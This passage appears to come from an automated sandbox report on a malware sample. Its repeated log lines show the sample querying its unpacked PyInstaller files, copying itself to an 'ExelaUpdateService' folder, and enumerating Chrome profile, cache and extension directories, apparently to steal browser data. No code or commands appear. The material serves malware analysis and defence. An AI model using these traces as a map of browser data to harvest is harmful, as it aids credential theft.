            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\aiohttp VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\aiohttp VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\aiohttp\_helpers.cp310-win_amd64.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\aiohttp\_http_writer.cp310-win_amd64.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\aiohttp VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\aiohttp\_http_parser.cp310-win_amd64.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\aiohttp VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\aiohttp\_websocket.cp310-win_amd64.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\_uuid.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\frozenlist VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\frozenlist VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\frozenlist VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\frozenlist VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\frozenlist\_frozenlist.cp310-win_amd64.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\cryptography VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\cryptography VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\cryptography\hazmat VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\cryptography\hazmat VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\cryptography\hazmat VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\cryptography\hazmat VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\cryptography\hazmat\bindings VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\cryptography\hazmat\bindings VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\cryptography\hazmat\bindings VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\cryptography\hazmat\bindings VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\cryptography\hazmat\bindings\_rust.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\_cffi_backend.cp310-win_amd64.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\cryptography\hazmat VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\cryptography\hazmat VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\49flztqg VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\921a1560-5524-44c0-8495-fce7014dcfba VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ar VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bg VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bn VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ca VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cy VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\el VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_CA VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_GB VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_US VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\es VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\et VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fil VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fr_CA VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_metadata VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_metadata VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\ff366d85-2475-4dfc-a5c6-01e0d6f59500 VolumeInformationJump to behavior
